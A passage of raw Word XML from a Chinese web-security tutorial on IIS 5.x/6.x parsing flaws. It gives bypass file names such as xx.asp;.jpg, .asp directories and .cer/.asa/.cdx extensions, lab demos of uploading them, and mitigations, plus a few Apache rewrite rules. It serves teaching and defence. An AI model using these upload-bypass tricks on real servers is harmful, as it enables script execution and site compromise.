        <w:t xml:space="preserve">RewriteRule .(Php.|Php3.) /index.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536D833A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/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">RewriteRule .(PHp.|PHp3.) /index.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B503C36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/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">RewriteRule .(PhP.|PhP3.) /index.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4022ABEC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/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">RewriteRule .(pHP.|pHP3.) /index.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2A6171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color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">RewriteRule .(PHP.|PHP3.) /index.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE8E453" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/IfModule&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C0770" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:spacing w:before="100" w:line="0" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0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10" w:name="_Toc17358"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>十一、IIS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.x-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IIS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6.x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解析漏洞（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>面试常问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）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="490631DF" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl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/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>5.x-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>6.x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>版本的服务器，大多为W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>indows server 2003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>系统，网站都比较古老，一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB41E3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般为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>开发语言。其解析漏洞也只能解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>文件，不能解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F7F487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W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>in7</w:t>
      </w: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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>-</w:t>
      </w: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 W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>in10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>中多为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>iis7.x-8.x</w:t>
      </w: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高版本服务器。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306CC300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b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>目录解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>(6.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57819650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形式：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">www.xxx.com/xx.asp/xx.jpg </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21706790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原理：服务器默认会把xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>和xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.asa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>目录下的文件都解析成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7041B36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b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>文件解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238BC006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形式：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">www.xxx.com/xx.asp;.jpg </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43525EC0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原理：服务器默认不解析分号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>后的内容，因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>xx.asp;.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>会被解析成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>asp</w:t>
      </w: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文件。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A09CAE9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b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>解析文件类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BA1A58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/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">IIS6.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>默认的可执行文件除了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>还包含这三种</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229189A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/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">/test.asa </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445B4DF2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/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">/test.cer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA1B2C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/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">/test.cdx </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D815428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b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>修复方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75864F08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目前尚无微软官方补丁，可自行编写正则，阻止上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>xx.asp;.jpg</w:t>
      </w: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类型的文件名。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C92D134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做好权限设置，限制用户创建文件夹。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677095EC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ind w:left="720" w:hanging="720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bookmarkStart w:id="11" w:name="_Toc24708"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">11.1 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞演示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65347D5C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①目录解析演示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BA319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在IISasp虚拟机站点目录新建 .asp后缀文件夹。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670CB79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服务器默认会把 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.asa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>目录下的任意后缀名的文件都解析成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DECA207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上传asp.jpg文件，尝试访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A10D5E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有个前提条件，就是用户对目录有修改权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EA3C4E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通过抓包发现其中的目录是可以通过请求来改变的，那么这种情况下很有可能成功。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F186A2E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②文件解析演示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AE4B7D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上传asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.asp;.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>文件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>iis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>能够对这个文件类型进行解析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1792E00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访问文件——访问成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A8B89D" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:kinsoku w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:before="100"/>
        <w:ind w:right="227"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="3"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:snapToGrid w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>③解析文件类型演示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBF63F4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IIS6.0默认可执行文件除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>还包含三种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786A90D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/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">/test.asa </w:t>
      </w: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   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">/test.cer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>/test.cdx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B432BB3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这三种也会被当作脚本解析，开发人员做黑名单时不加入此三种文件会导致漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF0304B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color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>上传一个cer后缀文件——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>访问此文件——访问成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7984E9" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="0" w:afterAutospacing="0" w:line="0" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc2651"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11.2 IIS7.x解析漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
